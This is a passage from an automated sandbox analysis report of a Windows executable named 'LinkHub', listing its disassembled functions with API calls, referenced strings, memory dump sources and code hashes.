                                                                                        • GetLengthSid.ADVAPI32(?), ref: 002617F9
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00261801
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00261808
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00261829
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00261830
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0026185F
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00261881
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00261893
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002618BA
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002618C1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002618CA
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002618D1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002618DA
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002618E1
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 002618ED
                                                                                        • HeapFree.KERNEL32(00000000), ref: 002618F4
                                                                                          • Part of subcall function 00261ADF: GetProcessHeap.KERNEL32(00000008,002614FD,?,00000000,?,002614FD,?), ref: 00261AED
                                                                                          • Part of subcall function 00261ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002614FD,?), ref: 00261AF4
                                                                                          • Part of subcall function 00261ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002614FD,?), ref: 00261B03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                        • String ID:
                                                                                        • API String ID: 4175595110-0
                                                                                        • Opcode ID: eb20bd7b282f84961fe3e336c2916829c64ae324c407253cc6ca07f01cbf33e0
                                                                                        • Instruction ID: e309cc01db9b955f24c2807838c0066719fc7ae14e7bee501c14cfd297abed95
                                                                                        • Opcode Fuzzy Hash: eb20bd7b282f84961fe3e336c2916829c64ae324c407253cc6ca07f01cbf33e0
                                                                                        • Instruction Fuzzy Hash: FF714E72D1020AAFEF10DFA5EC49FAEBBB8BF44350F184125F915A7190D731AA65CB60
                                                                                        Function 0028CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028CF1D
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0029DCD0,00000000,?,00000000,?,?), ref: 0028CFA4
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0028D004
                                                                                        • _wcslen.LIBCMT ref: 0028D054
                                                                                        • _wcslen.LIBCMT ref: 0028D0CF
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0028D112
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0028D221
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0028D2AD
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0028D2E1
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028D2EE
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0028D3C0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 9721498-966354055
                                                                                        • Opcode ID: 17264e5552b5be267b5c3a02dac77830eb47ff4ff84d831b89601e0ff9a27a48
                                                                                        • Instruction ID: 24f4c380b75f0f415fbd70eec9e1456bfe8a1c5efa263768bb2242729e74393f
                                                                                        • Opcode Fuzzy Hash: 17264e5552b5be267b5c3a02dac77830eb47ff4ff84d831b89601e0ff9a27a48
                                                                                        • Instruction Fuzzy Hash: 6A1279356247019FDB14EF14C881A2AB7E5EF88714F14885DF98A9B3A2CB31EC56CF81
                                                                                        Function 002913BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00291462
                                                                                        • _wcslen.LIBCMT ref: 0029149D
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002914F0
                                                                                        • _wcslen.LIBCMT ref: 00291526
                                                                                        • _wcslen.LIBCMT ref: 002915A2
                                                                                        • _wcslen.LIBCMT ref: 0029161D
                                                                                          • Part of subcall function 0021FD52: _wcslen.LIBCMT ref: 0021FD5D
                                                                                          • Part of subcall function 00263535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00263547
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 1103490817-4258414348
                                                                                        • Opcode ID: 161d9198e02fd54ea31382e78853bfca55ae658857f3a3089bd42fa4ff0b5ed7
                                                                                        • Instruction ID: 4165a81d6d557ae481cbd85e65204f3033ef69b09abf6f0a77d8337d1c1d759b
                                                                                        • Opcode Fuzzy Hash: 161d9198e02fd54ea31382e78853bfca55ae658857f3a3089bd42fa4ff0b5ed7
                                                                                        • Instruction Fuzzy Hash: 85E1CC316283028FCB14EF25C45096AB7E6BF98314B55895CF8969B3A2CB30ED75CF81
                                                                                        Function 0028D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 1256254125-909552448
                                                                                        • Opcode ID: 9ea0cdc61ebba1a3314c1b198955d8baa02cd8fe846a67b02be597379fcf06f7
                                                                                        • Instruction ID: 97ba75de2b72abe9351732d40ec13b6a29c1d739624e484cd1cb12aeff6aa429
                                                                                        • Opcode Fuzzy Hash: 9ea0cdc61ebba1a3314c1b198955d8baa02cd8fe846a67b02be597379fcf06f7
                                                                                        • Instruction Fuzzy Hash: 9871183A63212B8BCB10BE7CD900ABB33A5AB60354F610229F855972D4FA75DD7CC750
                                                                                        Function 00298D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00298DB5
                                                                                        • _wcslen.LIBCMT ref: 00298DC9
                                                                                        • _wcslen.LIBCMT ref: 00298DEC
                                                                                        • _wcslen.LIBCMT ref: 00298E0F
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00298E4D
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00296691), ref: 00298EA9
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00298EE2
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00298F25
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00298F5C
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00298F68
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00298F78
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,00296691), ref: 00298F87
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00298FA4
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00298FB0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 799131459-1154884017
                                                                                        • Opcode ID: c0dd149e2d6c1d7060b087dbb24ea6a06827bbe3c2bc20562a92675b53d82741
                                                                                        • Instruction ID: 2588415c33cfb7632a3c597ddec58b225b41e2339e3c29d53c471c33d3c505fd
                                                                                        • Opcode Fuzzy Hash: c0dd149e2d6c1d7060b087dbb24ea6a06827bbe3c2bc20562a92675b53d82741
                                                                                        • Instruction Fuzzy Hash: 8561F071920219BEEF14DF64DC45BBE77A8BF09B10F50810AF915D60D1DBB4A9A0CBA0
                                                                                        Function 002748BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0027493D
                                                                                        • _wcslen.LIBCMT ref: 00274948
                                                                                        • _wcslen.LIBCMT ref: 0027499F
                                                                                        • _wcslen.LIBCMT ref: 002749DD
                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 00274A1B
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00274A63
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00274A9E
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00274ACC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1839972693-4113822522
                                                                                        • Opcode ID: 769ce48f7a914b21a5d2b7ecb6cfd7d686c23e5df630618bb33ef7ca9e2212df
                                                                                        • Instruction ID: 09bc8ff7128eef98c5db637164ee3da604494c6b2558a307cb6bc75ff10bffca
                                                                                        • Opcode Fuzzy Hash: 769ce48f7a914b21a5d2b7ecb6cfd7d686c23e5df630618bb33ef7ca9e2212df
                                                                                        • Instruction Fuzzy Hash: 6F71E4725243029FC710EF24C84096BB7E4EF59758F408A2DF89997292EB31DD65CF81
                                                                                        Function 00266382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000063), ref: 00266395
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002663A7
                                                                                        • SetWindowTextW.USER32(?,?), ref: 002663BE
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 002663D3
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 002663D9
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 002663E9
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 002663EF
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00266410
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0026642A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00266433
                                                                                        • _wcslen.LIBCMT ref: 0026649A
                                                                                        • SetWindowTextW.USER32(?,?), ref: 002664D6
                                                                                        • GetDesktopWindow.USER32 ref: 002664DC
                                                                                        • GetWindowRect.USER32(00000000), ref: 002664E3
                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0026653A
                                                                                        • GetClientRect.USER32(?,?), ref: 00266547
                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 0026656C
                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00266596
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 895679908-0
                                                                                        • Opcode ID: 9d4663cef7f28ed6eab146f6d246dca3166c95afa0cee8c96baf76578d5efd48
                                                                                        • Instruction ID: 9175e7dc31e24b85ae910130b3e25736c474aa5a55b2704f74c1c5699071cba0
                                                                                        • Opcode Fuzzy Hash: 9d4663cef7f28ed6eab146f6d246dca3166c95afa0cee8c96baf76578d5efd48
                                                                                        • Instruction Fuzzy Hash: A4718F31900706EFDB20DFA8DE89AAEBBF5FF48704F100519E186A25A0DB71E994DB50
                                                                                        Function 0028086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00280884
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0028088F
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0028089A
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 002808A5
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 002808B0
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 002808BB
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 002808C6
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 002808D1
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 002808DC
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 002808E7
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 002808F2
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 002808FD
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00280908
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00280913
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0028091E
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00280929
                                                                                        • GetCursorInfo.USER32(?), ref: 00280939
                                                                                        • GetLastError.KERNEL32 ref: 0028097B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                        • String ID:
                                                                                        • API String ID: 3215588206-0
                                                                                        • Opcode ID: 6f5cbec6d2f72e698ddae7a1b4db07574ce5031556d17ec5568777181dea781b
                                                                                        • Instruction ID: 05dd49a500c22df3e5ffc3159ee2b0a51e8fd306fe01a396bde12bc7089a57e4
                                                                                        • Opcode Fuzzy Hash: 6f5cbec6d2f72e698ddae7a1b4db07574ce5031556d17ec5568777181dea781b
                                                                                        • Instruction Fuzzy Hash: 0F415470D0931A6BDB509FBA8CC985EBFE8FF04754B50452AE11CE7281DA78A801CF91
                                                                                        Function 00263A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k,
                                                                                        • API String ID: 176396367-228593006
                                                                                        • Opcode ID: 266b1bfdbd5e54027ffe9bd255b0f372654b162b4b5c49b6775f170127febfa3
                                                                                        • Instruction ID: 295fa4efe1ac6d3ae2aff1359550a40961987dea623ad81ee282a5d9cfbf63bc
                                                                                        • Opcode Fuzzy Hash: 266b1bfdbd5e54027ffe9bd255b0f372654b162b4b5c49b6775f170127febfa3
                                                                                        • Instruction Fuzzy Hash: 56E1C232A20516ABCB24DFA4C845AEDFBB4BF14710F10421AE456F7251DB70AEF59BA0
                                                                                        Function 00220436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00220436
                                                                                          • Part of subcall function 0022045D: InitializeCriticalSectionAndSpinCount.KERNEL32(002D170C,00000FA0,E9A0270B,?,?,?,?,00242733,000000FF), ref: 0022048C
                                                                                          • Part of subcall function 0022045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00242733,000000FF), ref: 00220497
                                                                                          • Part of subcall function 0022045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00242733,000000FF), ref: 002204A8
                                                                                          • Part of subcall function 0022045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 002204BE
                                                                                          • Part of subcall function 0022045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 002204CC
                                                                                          • Part of subcall function 0022045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 002204DA
                                                                                          • Part of subcall function 0022045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00220505
                                                                                          • Part of subcall function 0022045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00220510
                                                                                        • ___scrt_fastfail.LIBCMT ref: 00220457
                                                                                          • Part of subcall function 00220413: __onexit.LIBCMT ref: 00220419
                                                                                        Strings
                                                                                        • WakeAllConditionVariable, xrefs: 002204D2
                                                                                        • SleepConditionVariableCS, xrefs: 002204C4
                                                                                        • InitializeConditionVariable, xrefs: 002204B8
                                                                                        • kernel32.dll, xrefs: 002204A3
                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00220492
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                        • API String ID: 66158676-1714406822
                                                                                        • Opcode ID: 6d58fd5bda868f804d6b4d5b21ab7956153347a43de3d1a5029b1d7c83efc5ee
                                                                                        • Instruction ID: 2bb2d62608d03d714ace78dd1d4cb53bde753ae794904a31c38d2e0c481b834e
                                                                                        • Opcode Fuzzy Hash: 6d58fd5bda868f804d6b4d5b21ab7956153347a43de3d1a5029b1d7c83efc5ee
                                                                                        • Instruction Fuzzy Hash: D921F933A607257BD7102FE4BC8EB69B794EB06B61F40412BF905936A1DFB49C308E64
                                                                                        Function 00274F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(00000000,00000000,0029DCD0), ref: 00274F6C
                                                                                        • _wcslen.LIBCMT ref: 00274F80
                                                                                        • _wcslen.LIBCMT ref: 00274FDE
                                                                                        • _wcslen.LIBCMT ref: 00275039
                                                                                        • _wcslen.LIBCMT ref: 00275084
                                                                                        • _wcslen.LIBCMT ref: 002750EC
                                                                                          • Part of subcall function 0021FD52: _wcslen.LIBCMT ref: 0021FD5D
                                                                                        • GetDriveTypeW.KERNEL32(?,002C7C10,00000061), ref: 00275188
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2055661098-1000479233
                                                                                        • Opcode ID: 2edbbc66982a0a1f0a4c02a005591d2de89e86f732342875305f243e6fe3ab13
                                                                                        • Instruction ID: d56a90c35a7491aca42a88b7a388d1972051a3c33a76d8a287dc818111eb2744
                                                                                        • Opcode Fuzzy Hash: 2edbbc66982a0a1f0a4c02a005591d2de89e86f732342875305f243e6fe3ab13
                                                                                        • Instruction Fuzzy Hash: 9EB1C5316287129FC710EF28C890A6BF7E5BFA4714F50891DF59987292DBB0DC64CB92
                                                                                        Function 0028BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0028BBF8
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0028BC10
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0028BC34
                                                                                        • _wcslen.LIBCMT ref: 0028BC60
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0028BC74
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0028BC96
                                                                                        • _wcslen.LIBCMT ref: 0028BD92
                                                                                          • Part of subcall function 00270F4E: GetStdHandle.KERNEL32(000000F6), ref: 00270F6D
                                                                                        • _wcslen.LIBCMT ref: 0028BDAB
                                                                                        • _wcslen.LIBCMT ref: 0028BDC6
